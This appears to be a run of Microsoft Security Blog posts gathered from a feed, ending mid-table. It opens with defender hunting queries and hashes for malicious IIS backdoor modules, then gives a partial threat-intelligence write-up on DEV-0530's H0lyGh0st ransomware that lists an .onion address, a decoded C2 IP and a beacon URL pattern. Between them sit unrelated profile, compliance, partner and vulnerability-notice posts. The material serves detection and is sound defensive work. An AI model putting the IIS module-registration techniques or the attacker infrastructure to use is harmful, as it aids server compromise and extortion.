To locate malicious activity related to suspicious IIS module registration, run the following queries:
DeviceProcessEvents | where ProcessCommandLine has “appcmd.exe add module” | where InitiatingProcessParentFileName == “w3wp.exe”
DeviceProcessEvents | where InitiatingProcessFileName == “powershell.exe” |where ProcessCommandLine has ” system.enterpriseservices.internal.publish” | where InitiatingProcessParentFileName == “w3wp.exe”
DeviceProcessEvents |where ProcessCommandLine has ” \\gacutil.exe /I” | where InitiatingProcessParentFileName == “w3wp.exe”
| File name | SHA-256 |
| HttpCompress.dll | 4446f5fce13dd376ebcad8a78f057c0662880fdff7fe2b51706cb5a2253aa569 |
| HttpSessionModule.dll | 1d5681ff4e2bc0134981e1c62ce70506eb0b6619c27ae384552fe3bdc904205c |
| RewriterHttpModule.dll | c5c39dd5c3c3253fffdd8fee796be3a9361f4bfa1e0341f021fba3dafcab9739 |
| Microsoft.Exchange.HttpProxy. HttpUtilities.dll |
d820059577dde23e99d11056265e0abf626db9937fc56afde9b75223bf309eb0 |
| HttpManageMoudle.dll | 95721eedcf165cd74607f8a339d395b1234ff930408a46c37fa7822ddddceb80 |
| IIS_backdoor.dll | e352ebd81a0d50da9b7148cf14897d66fd894e88eda53e897baa77b3cc21bd8a |
| FinanceSvcModel.dll | 5da41d312f1b4068afabb87e40ad6de211fa59513deb4b94148c0abde5ee3bd5 |
| App_Web_system_web.ashx.dll | 290f8c0ce754078e27be3ed2ee6eff95c4e10b71690e25bbcf452481a4e09b9d |
| App_Web_error.ashx.dll | 2996064437621bfecd159a3f71166e8c6468225e1c0189238068118deeabaa3d |
The post Malicious IIS extensions quietly open persistent backdoors into servers appeared first on Microsoft Security Blog.
A technology career embodies the ancient Roman saying that “luck happens when preparation meets opportunity.” Few industries are as dynamic, fast-paced, or intense as technology. With so many challenges to solve, opportunities are everywhere, but as I’ve learned myself through the years, the best opportunities are not just the ones right in front of you, they’re the ones you create.
Nitika Gupta, a Microsoft Principal Product Manager who leads the team responsible for enterprise admin capabilities for identity security, personifies the spirit of preparing for, seizing, and creating opportunities, which she has done not only for herself but also for the people around her. Since joining Microsoft in 2013, she has never stayed complacent. Nitika is always learning, growing, and honing her expertise in identity, product management, and leadership so she’ll be ready to take on the next big challenge.
So many game-changing technologies started with a napkin, sticky note, or whiteboard, but no great idea ever comes to fruition without a champion determined to steward it from concept to working feature. Nitika has championed some of our most groundbreaking technologies, including Conditional Access, the heart and soul of Microsoft’s Zero Trust architecture. Her hard work and optimism have made her a go-to person on my team for new initiatives. I feel so fortunate to work with Nitika, and I hope her story inspires you to prepare for, seize, and create opportunities in your own career.
Nitika’s interview with Microsoft Partner Director of Identity Security Alex Weinert has been edited for clarity and length. You’ll find a video snippet embedded in the interview so you can hear Nitika talk about her work philosophy.
Alex: Tell us, Nitika, how you got to Microsoft.
Nitika: I grew up in India in a small city. I did really well in school in general, but I did really well in computer science courses, too. Naturally, I picked computer science as I headed to college in Singapore.
My last year at the National University of Singapore, I spent most of my time applying to companies in the United States that would sponsor my work visa. Since I was studying computer engineering, and all my internships were coding, I applied as a developer. During my second interview with Microsoft, the interviewer told me about a new role called program manager, which is now called product manager.
They didn’t hire program managers from overseas as much back then—only developers. The gentleman who interviewed me put in a good word for me, so the program management team in Redmond decided to interview me.
We ended up doing phone calls at odd times because I was sitting in Singapore and the interviewers were in Redmond. They ended up giving me an offer to join Microsoft as a program manager in the identity team. I was like, “This is exactly what I want,” since I wanted to relocate to the United States. Program management was new but sounded cool and I told myself if I didn’t like it, I could go back to being a developer. I had no clue what identity was, but that’s how I ended up in identity at Microsoft.
Alex: Incredible. What was your first project as a new product manager at Microsoft?
Nitika: I worked on resiliency of Microsoft Azure Active Directory (Azure AD) services. I started with the core authentication stack, but I wanted to work on something more customer-facing, where I could talk to customers firsthand. My manager happily agreed, so I started working on multifactor authentication (MFA). That’s when I met you, Alex. I still remember the whiteboarding session we did on Conditional Access in your office, which we converted into mockups for a road show. We ended up building it, and now it’s the most used feature in Azure AD today.
Alex: Back then, I was responsible for Latin America, and we did a customer tour there. On the last day, you and I had a conversation. You said you wanted to do bigger things. And I challenged you to go figure out what problem you wanted to solve and just solve it. Can you talk a bit about that?
Nitika: Yeah. Back then, I was working on admin experiences for identity security and was really spread too thin. I had a broad scope but didn’t feel like I was owning a business. I remember writing down my thoughts about what I was doing, what I liked and didn’t. I came to you, we had a chat, and you challenged me to think about what “my ideal role” looked like. And that’s a question I now often use to challenge my team when they want to make a change because as a manager, I’m very committed to giving them opportunities that align best with their passions and interests.
In any event, I came up with security adoption.
Alex: You engaged the field, the small and medium-sized business (SMB) market. You found partner teams and went super creative in a very entrepreneurial way—all as an individual contributor. You created what is now security defaults and the identity secure score, as well as the big MFA adoption push. Then another opportunity came your way. Tell us about that.
Nitika: It was an opportunity I didn’t see coming. A lot of opportunities have come from getting to a point where I wanted more challenge, but in this case, I was having a blast, right? I got to create my own role. I was driving this mission for adoption of security best practices. I was very jazzed about it, and suddenly you and our leadership surprised me with an opportunity to drive a compete feature on the cloud provisioning team. My career in identity until that point had been about the cloud. Once you get your identities in the cloud, how can we help you protect those identities with MFA, Conditional Access, identity protection, and adoption of security best practices? But I had little knowledge of the on-premises world, and this new job was all about bringing identities from on-premises to the cloud.
So for me, it was a very tough decision because I felt like I did not have the expertise and the experience I would need. Other people had been working on sync and provisioning scenarios for years, so I needed to leverage their expertise to build the best possible product for our customers. We had this ambitious goal of delivering a preview in six months or so, which ended up being closer to a year. It was a fun journey working on a zero-to-one product where I had zero expertise to start with, but we still made it happen.
Alex: Then we tapped you on the shoulder again.
Nitika: When you and Alex Simons offered me the opportunity to lead the Conditional Access, MFA, and security adoption team, I said, “This is out of my league.” I was very unsure and took a few days to accept, even though it was a dream job for me. But thanks to the support from you and Alex, I ended up taking the opportunity. I started leading the team right when we all began working from home at the start of the pandemic. It’s been very gratifying to support the team in such uncertain times and yet deliver the business outcomes.
Alex: One of the things I love is the way it came full circle, from that whiteboard session where we were just kind of like, “Hey, wouldn’t it be cool if…,” to something that’s now the heart of our Zero Trust strategy at Microsoft. You’re leading a 15-person team in three regions as we’re making huge bets on supporting the Cybersecurity Executive Order from the United States government, phish-proof credentials, the protection of machine accounts, and MFA adoption. Watching you grow and become such a strong leader has been awesome.
Nitika: Thank you. It’s about protecting our customers. That gets me excited every day I come to work. And it’s really the team, right? Every day, I think it’s about making sure everyone on the team can do their best work and achieve their career goals.
Learn more about Microsoft identity and access management.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
The post How one Microsoft product manager acts as champion for identity security appeared first on Microsoft Security Blog.
Compliance management is a complex process—one that gets increasingly more complicated the larger an organization grows. Microsoft knows this firsthand, not only because of our experience providing Security and Compliance solutions to customers but also because of the global reach and responsibility for maintaining compliance with a hefty number of regional and industry-specific regulations. Another thing Microsoft has learned along this journey is that the route is significantly smoother with an inclusive mindset and digital tools to ease the way.
In the new world of hybrid work, regulatory compliance has become a board-level directive. Local and global regulations dictate how to manage, store, and transmit data, making compliance more critical than ever before. However, to adhere to these regulatory standards, risks need to be identified and mitigated, and data needs to be governed according to policy. Embarking on this journey will provide additional valuable outcomes, like:
Microsoft’s compliance journey has given us insights and best practices that we can share with other organizations determined to strengthen their compliance management practices. Planning for the unexpected events that inevitably occur means aligning your people, processes, and technology. Here are five things we’ve learned along our compliance path—and stories of what’s worked for customers.
It’s difficult, if not impossible, to know if you’re headed in the right direction without knowing your current position. So, where do you start? Compliance management has gone from a nice to have to a must-have for organizations, which have huge a incentive to strengthen their compliance management practices. Keeping track of all the regulations they’re responsible for, however, can be challenging, especially for those companies in regulated industries, like financial services or healthcare. Maintaining a good compliance posture can help you avoid penalties, negative publicity, fines, and financial losses. Given how quickly regulations change, this can be a big challenge. And manually tracking compliance issues in spreadsheets often isn’t sufficient. As a first step, we recommend assessing the current state of your compliance with a visual tool that helps measure where you are today, and allows you to track your collective progress over time.
When people hear the term “compliance,” many instantly think about regulatory compliance. Understandably so, because regulations like the California Consumer Protection Act (CCPA) and General Data Protection Regulation (GDPR) receive a lot of press and attention. But as mentioned earlier, compliance goes way beyond regulations.
Compliance management can even lead to innovation. Customers tell us they feel free to adapt the way they operate in response to customer trends. Visionary Wealth Advisors, a financial management firm in the United States, wanted to allow customers to communicate with the company via text messaging but needed to manage that data securely for compliance reasons. Visionary Wealth Advisors was able to maximize security and compliance with Microsoft Purview Data Lifecycle Management and CellTrust SL2.
“A central pain point is that the client doesn’t understand the regulatory environment that we operate in,” said Ryan Barke, Chief Compliance Officer and General Counsel, Visionary Wealth Advsiors. “They just want to communicate with their financial advisor, and the financial advisor wants to communicate with the client. We can have a policy that says, advisors, you’re prohibited from text messaging with your clients but we cannot control the other end of that communication.”
Data breaches are accelerating—climbing 68 percent in 2021, costing an average of USD4.24 million each.1 Insider leaks of sensitive data, intellectual property (IP) theft, and fraud can all detrimentally impact a company. So, too, can regulatory violations, but CISOs may be so focused on data protection that data compliance doesn’t get as much attention. What we have learned on our journey is that compliance isn’t a CISO’s burden to bear alone. Multiple Microsoft executives were involved in meeting compliance regulations and obligations. People across Microsoft had to have a hand in compliance to drive the process.
Involving multiple leaders makes sense given how people throughout an organization will benefit from what strong compliance management makes possible. The City of Marion in Australia deployed Microsoft Purview Records Management to better manage the data collected from the 90 services it provides. As a result, city staff has become more engaged with the process of creating and handling information. They can organize themselves and their workflows in Microsoft Teams, set up SharePoint sites, create and link information, create their own Power BI reports, configure workflows, and connect varied information much easier.
“It helps our small team get lots of stuff done, and we don’t need to worry so much about compliance anymore,” said Karlheins Sohl, Information Management Team Leader, City of Marion. “We can trust the system to help take care of that, while we’re freed to focus on the quality of information and the service we provide to the City of Marion staff.”
In the event of legal action, a merger or acquisition, or an internal or external investigation, technology solutions can help you more efficiently find the relevant data you need. With the proliferation of data, that’s more important than ever.
The sheer volume of data can make this challenging. Technology solutions like Microsoft Purview eDiscovery can help you save time and money on tracking down data.
Through a solution like Microsoft Purview Communication Compliance, organizations can reduce risks related to regulatory compliance obligations.
Effective technology solutions have a wonderful way of simplifying complex processes—and often the workdays of those responsible for managing those processes. Multiple solution providers can complicate already challenging compliance processes and result in a fragmented, inefficient approach. Choosing a comprehensive solution, like Microsoft Purview, can help by continuously monitoring for compliance changes and automating the update process.
Texas-based Frost Bank must follow numerous banking regulations and employees recognize the importance of complying with them—“Compliance is like drinking coffee in the morning,” says Edward Contreras, CISO, Frost Bank. Keeping up with all of those regulations proved challenging before adopting Microsoft Purview Compliance Manager, which updates daily, adding at least 200 updates from more than 1,000 regulatory bodies and enabling the bank to create detailed reports for regulators and auditors.
“Compliance Manager took the mystery out of regulatory compliance for us,” said Glenn McClellan, Endpoint Architect, Frost Bank. “The solution provides improvement actions, excerpts from relevant regulations, and overall, made managing compliance really easy and actionable.”
Effective compliance and risk management are extremely important, and are possible. Microsoft is here to help if you’re looking to simplify your compliance management with technology solutions.
Microsoft Purview is a comprehensive set of compliance and risk management solutions that help organizations govern, protect, and manage data, and improve your company’s risk and compliance posture. These solutions include Microsoft Purview eDiscovery, which helps you discover, preserve, collect, process, cull, and analyze your data in one place; Microsoft Purview Compliance Manager, which helps you simplify compliance and reduce risk; and Microsoft Purview Communication Compliance, which helps foster compliant communications across corporate mediums. We’d love to offer support on your journey.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
1Cost of a Data Breach Report 2021, Ponemon Institute, IBM. 2021.
The post Discover 5 lessons Microsoft has learned about compliance management appeared first on Microsoft Security Blog.
Today, many enterprise organizations are multicloud and multiplatform. Critical enterprise data is located across clouds and platforms, requiring security and compliance no matter where it lives. To solve the complexity that comes with these environments, organizations have invested in multiple point solutions, which in turn can make it hard for them to manage the fragmented compliance and risk posture covering their entire data estate. To help organizations meet today’s global compliance and risk requirements across their multicloud, multiplatform data environments, we announced Microsoft Purview in April 2022.
Microsoft Purview is a portfolio of solutions for information protection, data governance, risk management, and compliance that enables organizations to effectively manage their data all from one place. It provides enhanced visibility that organizations can leverage across their environment to help close gaps that can lead to data exposure, simplify tasks through automation, stay up-to-date with regulatory requirements, and keep their most important asset—their data—secured. Partners play a critical role in helping customers manage their entire data estate. We’ve invested in connectors, APIs, and extensibility to support partners and help customers manage their data.
Today, we are excited to announce the general availability of the new Microsoft Graph APIs for Microsoft Purview eDiscovery. With the new Microsoft Purview eDiscovery APIs, organizations can leverage automation to streamline common, repetitive workflows that require a lot of manual effort in the product experience.
Customers and partners find automation and extensibility of eDiscovery workflows critically important because of the ability to reduce the potential for human error in highly sensitive workflows. For example, efficiently managing repeatable, defensible processes is critical to managing risk for organizations that have significant requirements for litigation and investigation.
Here are some of the ways partners are building value-added solutions and services using our Microsoft Purview eDiscovery APIs:
Relativity, Microsoft’s Security ISV of the Year for 2022, shared that “using the right tools to put business’s data into action is essential for many eDiscovery and compliance use cases. RelativityOne integration with Microsoft Purview eDiscovery significantly expedites the eDiscovery review process, minimizes data copies across multiple platforms, facilitates third-party collaboration, and ultimately reduces costs while the data remains secure within the Microsoft cloud. Now is the time to benefit from RelativityOne’s integration with Microsoft’s Purview’s eDiscovery platform,” said Chris Izsak, Strategic Partnerships GTM Manager, Relativity.
BDO’s Athenagy creates dashboards using both Microsoft Purview eDiscovery and RelativityOne. Their “patent-pending business intelligence dashboards now provide legal, IT, and compliance professionals a whole new level of data transparency and cost containment by surfacing up critical insights inside both Microsoft Purview eDiscovery—using the newly released Microsoft Purview eDiscovery APIs—and RelativityOne tied to legal hold, collect, preservation, processing, and review for every investigation, compliance, and litigation matter,” said Daniel Gold, inventor of Athenagy and managing director of E-Discovery Managed Services, BDO.
Epiq leverages Microsoft Purview eDiscovery APIs to create an end-to-end eDiscovery workflow. “Utilizing the Microsoft Purview eDiscovery APIs allows us to automate within Microsoft Purview to use inputs from our customer’s existing legal hold system of record to seamlessly orchestrate an end-to-end workflow including sending hold notices, preserving data in place, and performing searches, collections, and exports. When updates are made in the system of record, the changes are propagated directly to the appropriate piece of eDiscovery to ensure parity. An automated solution eliminates human error, reduces administrative costs, and ensures that eDiscovery processes are in sync with your issuance of legal holds,” said Jon Kessler, Vice President of Information Governance Services, Epiq.
Lighthouse uses Microsoft Purview eDiscovery APIs to create “a rich and intuitive user experience, taking advantage of custodian data mapping, in-place preservation, modern attachment retrieval, and advanced culling. Our automation and orchestration solution is designed to improve user efficacy with job failure oversight, completion notification, and automatic provisioning and management of Azure storage containers. Clients embracing this solution benefit from automation and orchestration to fully leverage Purview Premium eDiscovery’s apps securely and at scale,” said John Collins, Director of Advisory Services, Lighthouse (winner of the Compliance and Privacy Trailblazer award for 2022).
The opportunity for our partners who invest in the Microsoft compliance ecosystem continues to grow. Our partners are finding success by building value-added solutions and services around Microsoft’s solutions at an increasing rate. For example, partners are creating solutions that connect disparate information repositories for enterprise-wide compliance initiatives.
Microsoft partners continue to have the ability to participate in our successful go-to-market program, the partner build-intent workshops. These workshops cover the Microsoft Security portfolio and help drive customer success with Microsoft products and partner services through prescriptive scenarios that address the top pain points of our customers. These workshops have been updated to give partners the ability to uncover additional opportunities leveraging the most up-to-date tools and solutions. Discover all our partner workshops and get started with unlocking opportunities and value with your customers.
The Microsoft Purview platform enables our customers and partners to adapt, extend, integrate, and automate information protection, data governance, risk management, and compliance scenarios. These capabilities are enabled through our investments in these key building blocks:
Microsoft Purview APIs: We are constantly expanding our API surface area. With our investments in Microsoft Graph APIs we currently enabling extensibility scenarios across Purview Information Protection, Purview Data Lifecycle Management, Purview eDiscovery, Purview Audit, and more. Partners are using these APIs to build value-added services and solve unique customer scenarios.
Microsoft Purview Data Connectors: To enable high-fidelity data ingestion—including sources such as Slack, Zoom, and WhatsApp, we have partnered with Veritas, TeleMessage, 17a-4, and CellTrust to deliver more than 70 ready-to-use connectors. Our extensibility push provides more opportunities for partners to join this connector ecosystem.
Microsoft Purview Data Catalog: Microsoft Purview’s unified data governance capabilities help with managing on-premises, multicloud, and software as a service (SaaS) data. Microsoft Purview Data Catalog supports multicloud data classification and covers data repositories such as Azure Cosmos DB and Amazon Web Services (AWS) S3 buckets. There is also an Atlas Kafka API that facilitates extensibility scenarios for our partners and customers.
Microsoft Purview Compliance Manager: With universal templates, we help partners and customers extend compliance management capabilities to non-Microsoft environments.
Power Automate integrations: Microsoft Purview solutions including Microsoft Purview Data Lifecycle Management, Insider Risk Management, and Communication Compliance have built-in Power Automate integrations. This offers unique opportunities for our partners and customers to streamline and automate workflows and business scenarios.
Another way Microsoft supports the ecosystem is through the Microsoft Intelligent Security Association (MISA). MISA is an ecosystem of independent software vendors and managed service providers that have integrated their products and services with Microsoft’s security technology. Over the last year, MISA has extended its qualifying products to include a broad range of Microsoft Purview and Microsoft Priva products. MISA offers members co-marketing benefits and the opportunity to deepen their technology integrations and relationship within the Microsoft security ecosystem. MISA offers members co-marketing benefits and the opportunity to deepen their technology integrations and relationship within the Microsoft security ecosystem.
Here are a few ways that partners can join the Microsoft Purview ecosystem:
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
The post How Microsoft Purview and Priva support the partner ecosystem appeared first on Microsoft Security Blog.
Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers. The top three researchers of the 2022 Q2 Security Researcher Leaderboard are: Yuki Chen, Zhiyi Zhang, and William Söderberg! Check out the full list of researchers recognized …
Congratulations to the Top MSRC 2022 Q2 Security Researchers! Read More »
There has never been a greater demand for specialized cybersecurity expertise—or a greater opportunity for our partners to support our customers with new services and solutions. Over the last year, the permanent shift to hybrid work has empowered businesses to be remote and mobile. Increased adoption of public and private clouds has unlocked innovation, agility, and scale. At the same time, ransomware grew 105 percent over the past year and continues to become more sophisticated.1 The global cybersecurity talent shortage is now 2.72 million, and economic uncertainty has put the spotlight on extracting the highest possible return on investments.2
This week, as we join our partners at Microsoft Inspire, much of our conversation is focused on how, together, we can help our customers prioritize their security initiatives while getting the most out of the solutions they already have.
Every year I am so energized by the expertise and creativity of our partners. Much of what we learn comes from them, so we commissioned a Total Economic Impact
from Forrester Consulting to better understand the high-level trends driving their security, compliance, and identity opportunities. It’s incredible to see that the Microsoft Security partner opportunity grew 21 percent year-over-year across the board in Microsoft 365 security, cloud security, compliance, and identity:
Microsoft Security partners are expanding their existing offerings and creating new offerings in all these areas, packaging their unique experience, expertise, and IP for effective and efficient service delivery. Security deployment, advisory, solutions development, and managed services are needed now more than ever. In fact, within the USD247 billion cybersecurity market, security services spending is projected to reach USD77 billion by the end of 2022.3
Given the breadth of challenges our customers are facing, and recent economic headwinds, many organizations are looking to consolidate their security portfolios to optimize costs and reduce complexity. In fact, 78 percent of chief information security officers (CISOs) have 16 or more tools in their cybersecurity vendor portfolio, and according to Gartner®, “most organizations recognize vendor consolidation as an avenue for more efficient security, with 80 [percent] executing or interested in a strategy for this.”4
Microsoft integrates more than 50 different categories across security, compliance, identity, device management, and privacy—and most customers save 60 percent on average by leveraging Microsoft’s comprehensive security solutions compared to a multi-vendor strategy. All Microsoft Security product families work together as one comprehensive solution across clouds and across platforms, helping customers to reduce tool sprawl, maximize value out of what they already have, and reduce complexity. With recent announcements of Microsoft Entra and Microsoft Purview, we’ve also aligned our product portfolio with how our customers view the totality of their security challenges.
Consolidation isn’t just about tools—the lines between security workloads are blurring as well. Virtually every customer scenario includes elements of secure infrastructure, threat detection and response, identity management and secure access, compliance, and privacy—in fact, 90 percent of the Fortune 100 companies use four or more of these solutions. Our partners agree, and many are moving beyond their core specialty to provide a wider range of services to customers, creating new revenue streams and expanding their expertise as a result.
Assisting customers to deploy and fully leverage products they already own is one of the strongest ways our partners can deliver customer value. This week, Microsoft is announcing an entirely new partner investment to help partners drive customer success and product usage. Starting October 1, 2022, partners who help customers deploy their untapped security capabilities within Microsoft 365 E5 and Microsoft Azure will be eligible for up to USD25,000 per account. Microsoft is excited to provide this co-investment to ensure partners remain competitive in their offerings.
Once security products have been deployed, customers often need assistance analyzing and triaging security data to monitor their ecosystem. Microsoft is seeing a surge in organizations looking for a trusted managed detection and response (MDR) partner to help offload time-consuming work and augment their existing in-house security teams. Gartner estimates that 50 percent of organizations will be using MDR services by 2025, and with more than 785,000 customers currently using Microsoft’s advanced security products, the partner opportunity is tremendous. To meet this need, Microsoft has recently announced investments in our managed XDR partner community, including working with them to verify their XDR solutions for use with Microsoft products. Partners with a verified XDR service will have increased access to co-marketing funding to support their business and direct integration with Microsoft field sellers through co-sell opportunities. Partners can learn more about investing in managed XDR partner success.
At Microsoft, we are continually looking for ways to deliver more value with our solutions—and to make it easier for our partners to do the same. For example:
Microsoft recently announced a simplified and more flexible way to be identified as a Microsoft Security Solution Provider. If you’ve historically been a silver or gold security partner or Enterprise Mobility Management partner, you now have the opportunity this coming year to be recognized through the Microsoft Cloud Partner Program (MCPP) as a security solution partner.
Once identified, Microsoft offers a wide variety of co-marketing opportunities you can take advantage of in your own programs and in collaboration with Microsoft to differentiate your business, not the least of which is the opportunity to be recognized by Microsoft as the Security or Compliance partner of the year.
I’d like to congratulate Ernst and Young as the 2022 Security Partner of the Year in recognition of the use of the Zero Trust framework that fully leverages Microsoft Azure Active Directory (Azure AD) and Microsoft Azure Key Vault. I’d also like to recognize Edgile as the 2022 Compliance Partner of the Year for their integration of a comprehensive security framework that extends the capabilities of enterprises to also measure the maturity of their data governance. I want to congratulate these partners for their incredible work, as well as all the winners of the 2022 Microsoft Security Excellence Awards. I also want to express my gratitude to our entire partner community for all you do to advance our shared mission of security and to make the world a safer place.
Microsoft partners have an amazing opportunity to showcase their security proficiency, drive new growth, and create real-world impact. We invite all our partners to download our commissioned Forrester report to spur ideas on how to differentiate and expand their business. I’ll close with a few ideas:
Be sure to check out our sessions at Microsoft Inspire that go deeper into these topics as well:
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
1Report: Pretty much every type of cyberattack increased in 2021, Brandon Vigliarolo. February 17, 2022.
2(ISC)² Cybersecurity Workforce Study, (ISC)². 2021.
3Worldwide information security services spending from 2017 to 2022, Justina Alexandra Sava. April 27, 2022.
4Smarter with Gartner, The Top 8 Security and Risk Trends We’re Watching, November 15, 2021.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
The post How Microsoft Security partners are helping customers do more with less appeared first on Microsoft Security Blog.
本ブログは、Mitigation for Azure Storage SDK Client-Side Encryption Padding Oracle Vulnerability の抄訳版です。最新の情報は原文を参照してください。
Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.
The top three researchers of the 2022 Q2 Security Researcher Leaderboard are: Yuki Chen, Zhiyi Zhang, and William Söderberg! Check out the full list of researchers recognized this quarter here.
Summary: Google informed Microsoft under Coordinated Vulnerability Disclosure (CVD) of a padding oracle vulnerability that may affect customers using Azure Storage SDK (for Python, .NET, Java) client-side encryption (CVE-2022-30187). To mitigate this vulnerability, we released a new General Availability (GA) version of the Azure Storage SDK client-side encryption feature (v2) on July 12, 2022. Microsoft …
Mitigation for Azure Storage SDK Client-Side Encryption Padding Oracle Vulnerability Read More »
Summary Summary Google informed Microsoft under Coordinated Vulnerability Disclosure (CVD) of a padding oracle vulnerability that may affect customers using Azure Storage SDK (for Python, .NET, Java) client-side encryption (CVE-2022-30187). To mitigate this vulnerability, we released a new General Availability (GA) version of the Azure Storage SDK client-side encryption feature (v2) on July 12, 2022.
A group of actors originating from North Korea that Microsoft Threat Intelligence Center (MSTIC) tracks as DEV-0530 has been developing and using ransomware in attacks since June 2021. This group, which calls itself H0lyGh0st, utilizes a ransomware payload with the same name for its campaigns and has successfully compromised small businesses in multiple countries as early as September 2021.
Along with their H0lyGh0st payload, DEV-0530 maintains an .onion site that the group uses to interact with their victims. The group’s standard methodology is to encrypt all files on the target device and use the file extension .h0lyenc, send the victim a sample of the files as proof, and then demand payment in Bitcoin in exchange for restoring access to the files. As part of their extortion tactics, they also threaten to publish victim data on social media or send the data to the victims’ customers if they refuse to pay. This blog is intended to capture part of MSTIC’s analysis of DEV-0530 tactics, present the protections Microsoft has implemented in our security products, and share insights on DEV-0530 and H0lyGh0st ransomware with the broader security community to protect mutual customers.
MSTIC assesses that DEV-0530 has connections with another North Korean-based group tracked as PLUTONIUM (aka DarkSeoul or Andariel). While the use of H0lyGh0st ransomware in campaigns is unique to DEV-0530, MSTIC has observed communications between the two groups, as well as DEV-0530 using tools created exclusively by PLUTONIUM.
As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach high confidence about the origin or identity of the actor behind the activity.
DEV-0530 primarily operates ransomware campaigns to pursue financial objectives. In MSTIC’s investigations of their early campaigns, analysts observed that the group’s ransom note included a link to the .onion site hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion, where the attackers claim to “close the gap between the rich and poor”. They also attempt to legitimize their actions by claiming to increase the victim’s security awareness by letting the victims know more about their security posture.
Like many other ransomware actors, DEV-0530 notes on their website’s privacy policy that they would not sell or publish their victim’s data if they get paid. But if the victim fails to pay, they would publish everything. A contact form is also available for victims to get in touch with the attackers.
MSTIC assesses there is likely some overlap between DEV-0530 and PLUTONIUM. PLUTONIUM is a North Korean threat actor group affiliated with clusters of activity that are also known as DarkSeoul and Andariel. Active since at least 2014, PLUTONIUM has primarily targeted the energy and defense industries in India, South Korea, and the United States using a variety of tactics and techniques.
MSTIC has observed known DEV-0530 email accounts communicating with known PLUTONIUM attacker accounts. MSTIC has also observed both groups operating from the same infrastructure set, and even using custom malware controllers with similar names.
To further assess the origin of DEV-0530 operations, MSTIC performed a temporal analysis of observed activity from the group. MSTIC estimates that the pattern of life of DEV-0530 activity is most consistent with the UTC+8 and UTC+9 time zones. UTC+9 is the time zone used in North Korea.
Despite these similarities, differences in operational tempo, targeting, and tradecraft suggest DEV-0530 and PLUTONIUM are distinct groups.
Based on geopolitical observations by global experts on North Korean affairs and circumstantial observations, Microsoft analysts assess the use of ransomware by North Korea-based actors is likely motivated by two possible objectives.
The first possibility is that the North Korean government sponsors this activity. The weakened North Korean economy has become weaker since 2016 due to sanctions, natural disasters, drought, and the North Korean government’s COVID-19 lockdown from the outside world since early 2020. To offset the losses from these economic setbacks, the North Korean government could have sponsored cyber actors stealing from banks and cryptocurrency wallets for more than five years. If the North Korean government is ordering these ransomware attacks, then the attacks would be yet another tactic the government has enabled to offset financial losses.
However, state-sponsored activity against cryptocurrency organizations has typically targeted a much broader set of victims than observed in DEV-0530 victimology. Because of this, it is equally possible that the North Korean government is not enabling or supporting these ransomware attacks. Individuals with ties to PLUTONIUM infrastructure and tools could be moonlighting for personal gain. This moonlighting theory might explain the often-random selection of victims targeted by DEV-0530.
Although Microsoft cannot be certain of DEV-0530’s motivations, the impact of these ransomware attacks on our customers raises the importance of exposing the underlying tactics and techniques, detecting and preventing attacks in our security products, and sharing our knowledge with the security ecosystem.
Between June 2021 and May 2022, MSTIC classified H0lyGh0st ransomware under two new malware families: SiennaPurple and SiennaBlue. Both were developed and used by DEV-0530 in campaigns. MSTIC identified four variants under these families – BTLC_C.exe, HolyRS.exe, HolyLock.exe, and BLTC.exe – and clustered them based on code similarity, C2 infrastructure including C2 URL patterns, and ransom note text. BTLC_C.exe is written in C++ and is classified as SiennaPurple, while the rest are written in Go, and all variants are compiled into .exe to target Windows systems. Microsoft Defender Antivirus, which is built into and ships with Windows 10 and 11, detects and blocks BTLC_C.exe as SiennaPurple and the rest as SiennaBlue, providing protection for Windows users against all known variants the H0lyGh0st malware..
BLTC_C.exe is a portable ransomware developed by DEV-0530 and was first seen in June 2021. This ransomware doesn’t have many features compared to all malware variants in the SiennaBlue family. Prominently, if not launched as an administrative user, the BLTC_C.exe malware displays the following hardcoded error before exiting:
"This program only execute under admin privilege".
The malware uses a simple obfuscation method for strings where 0x30 is subtracted from the hex value of each character, such that the string “aic^ef^bi^abc0” is decoded to 193[.]56[.]29[.]123. The indicators of compromise (IOCs) decoded from the BLTC_C.exe ransomware are consistent with all malware variants in the SiennaBlue family, including the C2 infrastructure and the HTTP beacon URL structure access.php?order=AccessRequest&cmn. The BTLC_C.exe sample analyzed by MSTIC has the following PDB path: M:\ForOP\attack(utils)\attack tools\Backdoor\powershell\btlc_C\Release\btlc_C.pdb.
Between October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go. We classified these variants as SiennaBlue. While new Go functions were added to the different variants over time, all the ransomware in the SiennaBlue family share the same core Go functions.
A deeper look into the Go functions used in the SiennaBlue ransomware showed that over time, the core functionality expanded to include features like various encryption options, string obfuscation, public key management, and support for the internet and intranet. The table below demonstrates this expansion by comparing the Go functions in HolyRS.exe and BTLC.exe:
| HolyRS.exe [2021] | BTLC.exe [2022] |
|---|---|
